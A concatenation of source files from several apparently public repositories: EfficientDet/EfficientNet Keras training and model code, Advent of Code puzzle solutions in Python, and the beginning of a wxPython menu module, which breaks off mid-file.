import cv2
def preprocess_input(image):
image /= 255
mean=(0.406, 0.456, 0.485)
std=(0.225, 0.224, 0.229)
image -= mean
image /= std
return image
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def focal(alpha=0.25, gamma=2.0):
def _focal(y_true, y_pred):
# y_true [batch_size, num_anchor, num_classes+1]
# y_pred [batch_size, num_anchor, num_classes]
labels = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1] # -1 是需要忽略的, 0 是背景, 1 是存在目标
classification = y_pred
# 找出存在目标的先验框
indices_for_object = backend.where(keras.backend.equal(anchor_state, 1))
labels_for_object = backend.gather_nd(labels, indices_for_object)
classification_for_object = backend.gather_nd(classification, indices_for_object)
# 计算每一个先验框应该有的权重
alpha_factor_for_object = keras.backend.ones_like(labels_for_object) * alpha
alpha_factor_for_object = backend.where(keras.backend.equal(labels_for_object, 1), alpha_factor_for_object, 1 - alpha_factor_for_object)
focal_weight_for_object = backend.where(keras.backend.equal(labels_for_object, 1), 1 - classification_for_object, classification_for_object)
focal_weight_for_object = alpha_factor_for_object * focal_weight_for_object ** gamma
# 将权重乘上所求得的交叉熵
cls_loss_for_object = focal_weight_for_object * keras.backend.binary_crossentropy(labels_for_object, classification_for_object)
# 找出实际上为背景的先验框
indices_for_back = backend.where(keras.backend.equal(anchor_state, 0))
labels_for_back = backend.gather_nd(labels, indices_for_back)
classification_for_back = backend.gather_nd(classification, indices_for_back)
# 计算每一个先验框应该有的权重
alpha_factor_for_back = keras.backend.ones_like(labels_for_back) * (1 - alpha)
focal_weight_for_back = classification_for_back
focal_weight_for_back = alpha_factor_for_back * focal_weight_for_back ** gamma
# 将权重乘上所求得的交叉熵
cls_loss_for_back = focal_weight_for_back * keras.backend.binary_crossentropy(labels_for_back, classification_for_back)
# 标准化,实际上是正样本的数量
normalizer = tf.where(keras.backend.equal(anchor_state, 1))
normalizer = keras.backend.cast(keras.backend.shape(normalizer)[0], keras.backend.floatx())
normalizer = keras.backend.maximum(keras.backend.cast_to_floatx(1.0), normalizer)
# 将所获得的loss除上正样本的数量
cls_loss_for_object = keras.backend.sum(cls_loss_for_object)
cls_loss_for_back = keras.backend.sum(cls_loss_for_back)
# 总的loss
loss = (cls_loss_for_object + cls_loss_for_back)/normalizer
return loss
return _focal
def smooth_l1(sigma=3.0):
sigma_squared = sigma ** 2
def _smooth_l1(y_true, y_pred):
regression = y_pred
regression_target = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1]
indices = backend.where(keras.backend.equal(anchor_state, 1))
regression = backend.gather_nd(regression, indices)
regression_target = backend.gather_nd(regression_target, indices)
# compute smooth L1 loss
# f(x) = 0.5 * (sigma * x)^2 if |x| < 1 / sigma / sigma
# |x| - 0.5 / sigma / sigma otherwise
regression_diff = regression - regression_target
regression_diff = keras.backend.abs(regression_diff)
regression_loss = backend.where(
keras.backend.less(regression_diff, 1.0 / sigma_squared),
0.5 * sigma_squared * keras.backend.pow(regression_diff, 2),
regression_diff - 0.5 / sigma_squared
)
# compute the normalizer: the number of positive anchors
normalizer = keras.backend.maximum(1, keras.backend.shape(indices)[0])
normalizer = keras.backend.cast(normalizer, dtype=keras.backend.floatx())
return keras.backend.sum(regression_loss) / normalizer / 4
return _smooth_l1
class Generator(object):
# def __init__(self, bbox_util,batch_size,
# train_lines, val_lines, image_size,num_classes,
# ):
def __init__(self, bbox_util,batch_size,
train_images, train_boxes, val_images, val_boxes, image_size,num_classes,
):
self.bbox_util = bbox_util
self.batch_size = batch_size
# self.train_lines = train_lines
# self.val_lines = val_lines
self.train_images = train_images
self.train_boxes = train_boxes
self.val_images = val_images
self.val_boxes = val_boxes
# self.train_batches = len(train_lines)
self.train_batches = len(train_images)
# self.val_batches = len(val_lines)
self.val_batches = len(val_images)
self.image_size = image_size
self.num_classes = num_classes
# def get_random_data(self, annotation_line, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
def get_random_data(self, image, box, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
'''r实时数据增强的随机预处理'''
# line = annotation_line.split()
# image = Image.open(line[0])
image = Image.fromarray(image.astype(np.uint8))
iw, ih = image.size
h, w = input_shape
# box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
# resize image
new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)
scale = rand(.25, 2)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw,nh), Image.BICUBIC)
# place image
dx = int(rand(0, w-nw))
dy = int(rand(0, h-nh))
new_image = Image.new('RGB', (w,h), (128,128,128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand()<.5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
val = rand(1, val) if rand()<.5 else 1/rand(1, val)
x = cv2.cvtColor(np.array(image,np.float32)/255, cv2.COLOR_RGB2HSV)
x[..., 0] += hue*360
x[..., 0][x[..., 0]>1] -= 1
x[..., 0][x[..., 0]<0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x[:,:, 0]>360, 0] = 360
x[:, :, 1:][x[:, :, 1:]>1] = 1
x[x<0] = 0
image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB)*255 # numpy array, 0 to 1
# correct boxes
box_data = np.zeros((len(box),5))
if len(box)>0:
np.random.shuffle(box)
box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
if flip: box[:, [0,2]] = w - box[:, [2,0]]
box[:, 0:2][box[:, 0:2]<0] = 0
box[:, 2][box[:, 2]>w] = w
box[:, 3][box[:, 3]>h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box
box_data = np.zeros((len(box),5))
box_data[:len(box)] = box
if len(box) == 0:
return image_data, []
if (box_data[:,:4]>0).any():
return image_data, box_data
else:
return image_data, []
def generate(self, train = True, mosaic = True):
while True:
if train:
# 打乱
# shuffle(self.train_lines)
# lines = self.train_lines
N = self.train_images.shape[0]
permut = np.random.permutation(N)
else:
# shuffle(self.val_lines)
# lines = self.val_lines
N = self.val_images.shape[0]
permut = np.random.permutation(N)
inputs = []
target0 = []
target1 = []
# n = len(lines)
# for i in range(len(lines)):
for i in permut:
if train:
img,y = self.get_random_data(self.train_images[i],self.train_boxes[i], self.image_size[0:2])
else:
img,y = self.get_random_data(self.val_images[i],self.val_boxes[i], self.image_size[0:2])
# i = (i+1) % N
if len(y)!=0:
boxes = np.array(y[:,:4],dtype=np.float32)
boxes[:,0] = boxes[:,0]/self.image_size[1]
boxes[:,1] = boxes[:,1]/self.image_size[0]
boxes[:,2] = boxes[:,2]/self.image_size[1]
boxes[:,3] = boxes[:,3]/self.image_size[0]
one_hot_label = np.eye(self.num_classes)[np.array(y[:,4],np.int32)]
y = np.concatenate([boxes,one_hot_label],axis=-1)
# 计算真实框对应的先验框,与这个先验框应当有的预测结果
assignment = self.bbox_util.assign_boxes(y)
regression = assignment[:,:5]
classification = assignment[:,5:]
inputs.append(preprocess_input(img))
target0.append(np.reshape(regression,[-1,5]))
target1.append(np.reshape(classification,[-1,self.num_classes+1]))
if len(target0) == self.batch_size:
tmp_inp = np.array(inputs)
tmp_targets = [np.array(target0,dtype=np.float32),np.array(target1,dtype=np.float32)]
inputs = []
target0 = []
target1 = []
yield tmp_inp, tmp_targets
```
#### File: efficientdet-keras/nets/efficientnet.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import math
import string
import collections
import numpy as np
from keras import backend
from six.moves import xrange
from nets.layers import BatchNormalization
from keras import layers
BASE_WEIGHTS_PATH = (
'https://github.com/Callidior/keras-applications/'
'releases/download/efficientnet/')
WEIGHTS_HASHES = {
'efficientnet-b0': ('163292582f1c6eaca8e7dc7b51b01c61'
'5b0dbc0039699b4dcd0b975cc21533dc',
'c1421ad80a9fc67c2cc4000f666aa507'
'89ce39eedb4e06d531b0c593890ccff3'),
'efficientnet-b1': ('d0a71ddf51ef7a0ca425bab32b7fa7f1'
'6043ee598ecee73fc674d9560c8f09b0',
'75de265d03ac52fa74f2f510455ba64f'
'9c7c5fd96dc923cd4bfefa3d680c4b68'),
'efficientnet-b2': ('bb5451507a6418a574534aa76a91b106'
'f6b605f3b5dde0b21055694319853086',
'433b60584fafba1ea3de07443b74cfd3'
'2ce004a012020b07ef69e22ba8669333'),
'efficientnet-b3': ('03f1fba367f070bd2545f081cfa7f3e7'
'6f5e1aa3b6f4db700f00552901e75ab9',
'c5d42eb6cfae8567b418ad3845cfd63a'
'a48b87f1bd5df8658a49375a9f3135c7'),
'efficientnet-b4': ('98852de93f74d9833c8640474b2c698d'
'b45ec60690c75b3bacb1845e907bf94f',
'<KEY>'
'd9d91ea64877e8d9c38b6c1e0767c411'),
'efficientnet-b5': ('30172f1d45f9b8a41352d4219bf930ee'
'3339025fd26ab314a817ba8918fefc7d',
'9d197bc2bfe29165c10a2af8c2ebc675'
'07f5d70456f09e584c71b822941b1952'),
'efficientnet-b6': ('f5270466747753485a082092ac9939ca'
'a546eb3f09edca6d6fff842cad938720',
'1d0923bb038f2f8060faaf0a0449db4b'
'96549a881747b7c7678724ac79f427ed'),
'efficientnet-b7': ('876a41319980638fa597acbbf956a82d'
'10819531ff2dcb1a52277f10c7aefa1a',
'60b56ff3a8daccc8d96edfd40b204c11'
'3e51748da657afd58034d54d3cec2bac')
}
BlockArgs = collections.namedtuple('BlockArgs', [
'kernel_size', 'num_repeat', 'input_filters', 'output_filters',
'expand_ratio', 'id_skip', 'strides', 'se_ratio'
])
# defaults will be a public argument for namedtuple in Python 3.7
# https://docs.python.org/3/library/collections.html#collections.namedtuple
BlockArgs.__new__.__defaults__ = (None,) * len(BlockArgs._fields)
DEFAULT_BLOCKS_ARGS = [
BlockArgs(kernel_size=3, num_repeat=1, input_filters=32, output_filters=16,
expand_ratio=1, id_skip=True, strides=[1, 1], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=2, input_filters=16, output_filters=24,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=2, input_filters=24, output_filters=40,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=3, input_filters=40, output_filters=80,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=3, input_filters=80, output_filters=112,
expand_ratio=6, id_skip=True, strides=[1, 1], se_ratio=0.25),
BlockArgs(kernel_size=5, num_repeat=4, input_filters=112, output_filters=192,
expand_ratio=6, id_skip=True, strides=[2, 2], se_ratio=0.25),
BlockArgs(kernel_size=3, num_repeat=1, input_filters=192, output_filters=320,
expand_ratio=6, id_skip=True, strides=[1, 1], se_ratio=0.25)
]
CONV_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 2.0,
'mode': 'fan_out',
# EfficientNet actually uses an untruncated normal distribution for
# initializing conv layers, but keras.initializers.VarianceScaling use
# a truncated distribution.
# We decided against a custom initializer for better serializability.
'distribution': 'normal'
}
}
DENSE_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 1. / 3.,
'mode': 'fan_out',
'distribution': 'uniform'
}
}
def get_swish():
def swish(x):
return x * backend.sigmoid(x)
return swish
def get_dropout():
class FixedDropout(layers.Dropout):
def _get_noise_shape(self, inputs):
if self.noise_shape is None:
return self.noise_shape
symbolic_shape = backend.shape(inputs)
noise_shape = [symbolic_shape[axis] if shape is None else shape
for axis, shape in enumerate(self.noise_shape)]
return tuple(noise_shape)
return FixedDropout
def round_filters(filters, width_coefficient, depth_divisor):
filters *= width_coefficient
new_filters = int(filters + depth_divisor / 2) // depth_divisor * depth_divisor
new_filters = max(depth_divisor, new_filters)
if new_filters < 0.9 * filters:
new_filters += depth_divisor
return int(new_filters)
def round_repeats(repeats, depth_coefficient):
return int(math.ceil(depth_coefficient * repeats))
def mb_conv_block(inputs, block_args, activation, drop_rate=None, prefix='', freeze_bn=False):
has_se = (block_args.se_ratio is not None) and (0 < block_args.se_ratio <= 1)
bn_axis = 3
Dropout = get_dropout()
filters = block_args.input_filters * block_args.expand_ratio
if block_args.expand_ratio != 1:
x = layers.Conv2D(filters, 1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'expand_conv')(inputs)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'expand_bn')(x)
x = layers.Activation(activation, name=prefix + 'expand_activation')(x)
else:
x = inputs
# Depthwise Convolution
x = layers.DepthwiseConv2D(block_args.kernel_size,
strides=block_args.strides,
padding='same',
use_bias=False,
depthwise_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'dwconv')(x)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'bn')(x)
x = layers.Activation(activation, name=prefix + 'activation')(x)
# Squeeze and Excitation phase
if has_se:
num_reduced_filters = max(1, int(
block_args.input_filters * block_args.se_ratio
))
se_tensor = layers.GlobalAveragePooling2D(name=prefix + 'se_squeeze')(x)
target_shape = (1, 1, filters) if backend.image_data_format() == 'channels_last' else (filters, 1, 1)
se_tensor = layers.Reshape(target_shape, name=prefix + 'se_reshape')(se_tensor)
se_tensor = layers.Conv2D(num_reduced_filters, 1,
activation=activation,
padding='same',
use_bias=True,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'se_reduce')(se_tensor)
se_tensor = layers.Conv2D(filters, 1,
activation='sigmoid',
padding='same',
use_bias=True,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'se_expand')(se_tensor)
if backend.backend() == 'theano':
# For the Theano backend, we have to explicitly make
# the excitation weights broadcastable.
pattern = ([True, True, True, False] if backend.image_data_format() == 'channels_last'
else [True, False, True, True])
se_tensor = layers.Lambda(
lambda x: backend.pattern_broadcast(x, pattern),
name=prefix + 'se_broadcast')(se_tensor)
x = layers.multiply([x, se_tensor], name=prefix + 'se_excite')
# Output phase
x = layers.Conv2D(block_args.output_filters, 1,
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name=prefix + 'project_conv')(x)
# x = BatchNormalization(freeze=freeze_bn, axis=bn_axis, name=prefix + 'project_bn')(x)
x = layers.BatchNormalization(axis=bn_axis, name=prefix + 'project_bn')(x)
if block_args.id_skip and all(
s == 1 for s in block_args.strides
) and block_args.input_filters == block_args.output_filters:
if drop_rate and (drop_rate > 0):
x = Dropout(drop_rate,
noise_shape=(None, 1, 1, 1),
name=prefix + 'drop')(x)
x = layers.add([x, inputs], name=prefix + 'add')
return x
def EfficientNet(width_coefficient,
depth_coefficient,
default_resolution,
dropout_rate=0.2,
drop_connect_rate=0.2,
depth_divisor=8,
blocks_args=DEFAULT_BLOCKS_ARGS,
model_name='efficientnet',
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
freeze_bn=False,
**kwargs):
features = []
if input_tensor is None:
img_input = layers.Input(shape=input_shape)
else:
img_input = input_tensor
bn_axis = 3
activation = get_swish(**kwargs)
# Build stem
x = img_input
x = layers.Conv2D(round_filters(32, width_coefficient, depth_divisor), 3,
strides=(2, 2),
padding='same',
use_bias=False,
kernel_initializer=CONV_KERNEL_INITIALIZER,
name='stem_conv')(x)
# x = BatchNormalization(freeze=freeze_bn, axis=bn_axis, name='stem_bn')(x)
x = layers.BatchNormalization(axis=bn_axis, name='stem_bn')(x)
x = layers.Activation(activation, name='stem_activation')(x)
# Build blocks
num_blocks_total = sum(block_args.num_repeat for block_args in blocks_args)
block_num = 0
for idx, block_args in enumerate(blocks_args):
assert block_args.num_repeat > 0
# Update block input and output filters based on depth multiplier.
block_args = block_args._replace(
input_filters=round_filters(block_args.input_filters,
width_coefficient, depth_divisor),
output_filters=round_filters(block_args.output_filters,
width_coefficient, depth_divisor),
num_repeat=round_repeats(block_args.num_repeat, depth_coefficient))
# The first block needs to take care of stride and filter size increase.
drop_rate = drop_connect_rate * float(block_num) / num_blocks_total
x = mb_conv_block(x, block_args,
activation=activation,
drop_rate=drop_rate,
prefix='block{}a_'.format(idx + 1),
freeze_bn=freeze_bn
)
block_num += 1
if block_args.num_repeat > 1:
# pylint: disable=protected-access
block_args = block_args._replace(
input_filters=block_args.output_filters, strides=[1, 1])
# pylint: enable=protected-access
for bidx in xrange(block_args.num_repeat - 1):
drop_rate = drop_connect_rate * float(block_num) / num_blocks_total
block_prefix = 'block{}{}_'.format(
idx + 1,
string.ascii_lowercase[bidx + 1]
)
x = mb_conv_block(x, block_args,
activation=activation,
drop_rate=drop_rate,
prefix=block_prefix,
freeze_bn=freeze_bn
)
block_num += 1
if idx < len(blocks_args) - 1 and blocks_args[idx + 1].strides[0] == 2:
features.append(x)
elif idx == len(blocks_args) - 1:
features.append(x)
return features
def EfficientNetB0(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.0, 1.0, 224, 0.2,
model_name='efficientnet-b0',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB1(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.0, 1.1, 240, 0.2,
model_name='efficientnet-b1',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB2(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.1, 1.2, 260, 0.3,
model_name='efficientnet-b2',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB3(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.2, 1.4, 300, 0.3,
model_name='efficientnet-b3',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB4(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.4, 1.8, 380, 0.4,
model_name='efficientnet-b4',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB5(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.6, 2.2, 456, 0.4,
model_name='efficientnet-b5',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB6(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(1.8, 2.6, 528, 0.5,
model_name='efficientnet-b6',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
def EfficientNetB7(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
**kwargs):
return EfficientNet(2.0, 3.1, 600, 0.5,
model_name='efficientnet-b7',
include_top=include_top, weights=weights,
input_tensor=input_tensor, input_shape=input_shape,
pooling=pooling, classes=classes,
**kwargs)
``` |
{
"source": "JonoRicci/Advent-Of-Code",
"score": 4
} |
#### File: day-09/solution-01/day-09.py
```python
def main() -> None:
"""
Imports puzzle input, processes data and displays result.
"""
data_stream = import_puzzle()
# Part 01
invalid_number = get_invalid_number(data_stream)
print(f"Part 01: The invalid number is {invalid_number}.")
# Part 02
print(
f"Part 02: The encryption weakness number is {get_encryption_weakness(data_stream, invalid_number)}."
)
def get_encryption_weakness(data_stream: list, invalid_number: int) -> int:
"""
Loop through the whole data stream (minus the last value).
For each number in loop, loop through rest of numbers in stream.
If the sum of the numbers so far is equal to invalid number then yee haw.
:return: The sum of the min and max of the contiguous stream.
:rtype: int
"""
found = False
for i in range(len(data_stream) - 1):
numbers = [data_stream[i]]
for j in range(i + 1, len(data_stream)):
numbers.append(data_stream[j])
if sum(numbers) == invalid_number:
found = True
break
elif sum(numbers) > invalid_number:
break
if found:
break
return min(numbers) + max(numbers)
def get_invalid_number(data_stream: list) -> int:
"""
Loop through all to end starting at 26th index.
First 25 are pre-amble.
We loop through every combination of j and k in preamble.
:return: The invalid number
:rtype: int
"""
for i in range(25, len(data_stream)):
preamble = data_stream[i - 25 : i]
number = data_stream[i]
found = False
# Loop through every combination
for j in range(len(preamble) - 1):
for k in range(j + 1, len(preamble)):
if preamble[j] + preamble[k] == number:
found = True
break # Inner loop
if found:
break # Outer loop
if found:
continue
return number
def import_puzzle() -> list:
"""
Import the raw puzzle-input and return.
:return: File as list of lines
:rtype: list
"""
with open("../puzzle-input") as file:
data = file.readlines()
data = [int(line.strip()) for line in data] # Input is list of ints
return data
if __name__ == "__main__":
main()
```
#### File: day-11/solution-01/day-11.py
```python
from typing import Tuple # Type hinting for multiple returns
def main() -> None:
"""
Imports puzzle input, processes seating and displays result.
"""
original_seating = import_puzzle()
# Part 01
seating_count_01 = get_final_count(original_seating, 4)
print(
f"Part 01: There are {seating_count_01[0]} occupied seats after {seating_count_01[1]} rounds of changes."
)
# Part 02
seating_count_02 = get_final_count(original_seating, 5)
print(
f"Part 02: There are {seating_count_02[0]} occupied seats after {seating_count_02[1]} rounds of changes."
)
def get_final_count(seating: list, tolerance: int) -> Tuple[int, int]:
"""
Take in the original seating layout, and render the seating rules against it.
Iterate over the new round of seating and apply the rules again.
Continue to do this until there the previous iteration is identical to the current iteration.
:return: Total count of occupied seats.
:rtype: int
"""
previous = seating.copy()
render_rules(seating, tolerance)
seating_rounds = 0
while seating != previous:
previous = seating.copy()
render_rules(seating, tolerance)
seating_rounds += 1
occupied_seats = get_occupied_seats(previous)
return occupied_seats, seating_rounds - 1
def render_rules(seating: list, tolerance: int) -> list:
"""
Iterate over every position in the seating area.
If a seat (empty or occupied) has been found, calculate the seats around it.
Modify the seat as appropriate.
Append to a new list of list of the seating arrangement.
"""
seating_iteration = []
for row in range(len(seating)):
current_row = seating[row]
new_row = []
for column in range(len(current_row)):
if current_row[column] == ".":
new_row.append(".")
continue
adjacent_count = 0
if tolerance == 4:
adjacent_count = get_adjacent_count(seating, row, column)
elif tolerance == 5:
adjacent_count = get_updated_adjacent_count(seating, row, column)
if current_row[column] == "L" and adjacent_count == 0:
new_row.append("#")
elif current_row[column] == "#" and adjacent_count >= tolerance:
new_row.append("L")
else:
new_row.append(current_row[column])
seating_iteration.append(new_row)
for i in range(len(seating)):
seating[i] = seating_iteration[i]
return seating_iteration
def get_updated_adjacent_count(seating: list, row: int, column: int) -> int:
"""
Take the current iteration of seating layout, and the position.
Multiple if statements to add to counter when rules are true.
:return: Count of adjacent occupied seats.
:rtype: int
"""
count = 0
north_seat = row - 1
south_seat = row + 1
east_seat = column + 1
west_seat = column - 1
n, s, e, w, ne, se, nw, sw = False, False, False, False, False, False, False, False
while not (n and s and w and e and ne and se and nw and sw):
# North
if not n and north_seat >= 0:
if seating[north_seat][column] == "#":
count += 1
n = True
elif seating[north_seat][column] == "L":
n = True
else:
n = True
# South
if not s and south_seat <= len(seating) - 1:
if seating[south_seat][column] == "#":
count += 1
s = True
elif seating[south_seat][column] == "L":
s = True
else:
s = True
# East
if not e and east_seat <= len(seating[row]) - 1:
if seating[row][east_seat] == "#":
count += 1
e = True
elif seating[row][east_seat] == "L":
e = True
else:
e = True
# West
if not w and west_seat >= 0:
if seating[row][west_seat] == "#":
count += 1
w = True
elif seating[row][west_seat] == "L":
w = True
else:
w = True
# North West
if not nw and north_seat >= 0 and west_seat >= 0:
if seating[north_seat][west_seat] == "#":
count += 1
nw = True
elif seating[north_seat][west_seat] == "L":
nw = True
else:
nw = True
# South West
if not sw and south_seat <= len(seating) - 1 and west_seat >= 0:
if seating[south_seat][west_seat] == "#":
count += 1
sw = True
elif seating[south_seat][west_seat] == "L":
sw = True
else:
sw = True
# North East
if not ne and north_seat >= 0 and east_seat <= len(seating[row]) - 1:
if seating[north_seat][east_seat] == "#":
count += 1
ne = True
elif seating[north_seat][east_seat] == "L":
ne = True
else:
ne = True
# South East
if (
not se
and south_seat <= len(seating) - 1
and east_seat <= len(seating[row]) - 1
):
if seating[south_seat][east_seat] == "#":
count += 1
se = True
elif seating[south_seat][east_seat] == "L":
se = True
else:
se = True
north_seat -= 1
south_seat += 1
east_seat += 1
west_seat -= 1
return count
def get_adjacent_count(seating: list, row: int, column: int) -> int:
"""
Take the current iteration of seating layout, and the position.
Multiple if statements to add to counter when rules are true.
:return: Count of adjacent occupied seats.
:rtype: int
"""
count = 0
current_row = seating[row]
# Check West
if column - 1 >= 0:
if current_row[column - 1] == "#":
count += 1
# Check East
if column + 1 <= len(current_row) - 1:
if current_row[column + 1] == "#":
count += 1
# Check North
if row - 1 >= 0:
north_row = seating[row - 1]
if north_row[column] == "#":
count += 1
if column - 1 >= 0:
if north_row[column - 1] == "#":
count += 1
if column + 1 <= len(north_row) - 1:
if north_row[column + 1] == "#":
count += 1
# Check South
if row + 1 <= len(seating) - 1:
south_row = seating[row + 1]
if south_row[column] == "#":
count += 1
if column - 1 >= 0:
if south_row[column - 1] == "#":
count += 1
if column + 1 <= len(south_row) - 1:
if south_row[column + 1] == "#":
count += 1
return count
def get_occupied_seats(seating: list) -> int:
"""
Iterate over list of lists and for each item check if string is '#' (occupied).
:return: Count of occupied seats.
:rtype: list
"""
count = 0
for i in range(len(seating)):
for j in range(len(seating[i])):
if seating[i][j] == "#":
count += 1
return count
def import_puzzle() -> list:
"""
Import the raw puzzle-input and return.
:return: File as list of lines
:rtype: list
"""
with open("../puzzle-input") as file:
seating = file.readlines()
seating = [list(line.strip()) for line in seating]
return seating
if __name__ == "__main__":
main()
```
#### File: 2021/day_04/day_04.py
```python
from logger import logger
def main() -> None:
"""
Import the puzzle input, process and display the results.
"""
puzzle_input = import_list()
logger.debug(puzzle_input)
final_score = play_bingo(puzzle_input)
for result in final_score:
logger.info(f"The final score is: {result}.")
def import_list() -> list:
"""
Import the puzzle input and return a list.
:return: Puzzle input text file as list
:rtype: list
"""
file = open("puzzle-input", "r")
string_list = file.read().splitlines()
file.close()
return string_list
def play_bingo(bingo_cards: list) -> list:
"""
Extract winning numbers, bingo boards from input.
Make a separate 2D list tracking wins.
For each winning number, check every board row and column for a match.
Add matches to the 2D list tracking wins.
Once done, check 2D list for winning columns / rows.
Add winning boards to new list along with winning number.
Multiply to get score.
:param bingo_cards: puzzle input where each line is a string
:return: First and last winning board score
:rtype: list
"""
winning_numbers = [int(x) for x in bingo_cards[0].split(",")]
logger.debug(f" Winning numbers: {winning_numbers}")
single_board = []
all_boards = []
final_score_list = []
# Get Bingo Boards
for line in range(len(bingo_cards)):
if "," not in bingo_cards[line]:
row = [int(x) for x in bingo_cards[line].split()]
if row:
logger.debug(row)
single_board.append(row)
elif single_board:
all_boards.append(single_board)
single_board = []
# Set up separate 2D list tracking matches to winning numbers.
unmarked_tracker = []
for board in all_boards:
assert len(board) == 5 and len(board[0]) == 5
unmarked_tracker.append([[False for _ in range(5)] for _ in range(5)])
# Set up list to track winning boards.
winning_board = [False for _ in range(len(all_boards))]
for number in winning_numbers:
for index, board in enumerate(all_boards):
logger.debug(f"Checking board: {index} for {number}")
# Check for winning numbers.
for row in range(5):
for column in range(5):
if board[row][column] == number:
logger.debug(f"{unmarked_tracker[index][row][column]} "
f"is True.")
unmarked_tracker[index][row][column] = True
# Check for 5 in a row.
won = False
for row in range(5):
ok = True
for column in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for 5 in a column.
for column in range(5):
ok = True
for row in range(5):
if not unmarked_tracker[index][row][column]:
ok = False
if ok:
won = True
# Check for each winning board.
if won and not winning_board[index]:
winning_board[index] = True
winning_boards_count = len([j for j in range(len(all_boards))
if winning_board[j]])
# If first or last board.
if winning_boards_count == 1 or winning_boards_count == \
len(all_boards):
# Calculate all unmarked.
unmarked = 0
for row in range(5):
for column in range(5):
if not unmarked_tracker[index][row][column]:
unmarked += board[row][column]
final_score_list.append(unmarked * number)
logger.debug(f"The final score is: {final_score_list[-1]}, "
f"which is {unmarked} * {number}.")
return final_score_list
if __name__ == "__main__":
main()
``` |
{
"source": "jonorthwash/treemendous",
"score": 2
} |
#### File: treemendous/src/menus.py
```python
import gettext
import wx
_ = gettext.translation("treemendous", fallback=True).gettext
class AddNodeMenu(wx.Menu):
def __init__(self, parent):
super().__init__()
self.parent = parent
child = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a child in the add node pop-up menu.
_("&Child"),
# Translators: Help text in the add node pop-up menu.
_("Add a new node as an immediate child of the current selection"),
)
self.Append(child)
self.Bind(wx.EVT_MENU, self.OnChild, child)
parent = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a parent in the add node pop-up menu.
_("&Parent"),
# Translators: Help text in the add node pop-up menu.
_("Add a new node that contains the currently selected subtree"),
)
self.Append(parent)
self.Bind(wx.EVT_MENU, self.OnParent, parent)
if self.parent.tree.selection != self.parent.tree.root:
sibling = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: The option for adding a sibling in the add node pop-up menu.
_("&Sibling"),
_(
# Translators: Help text in the add node pop-up menu.
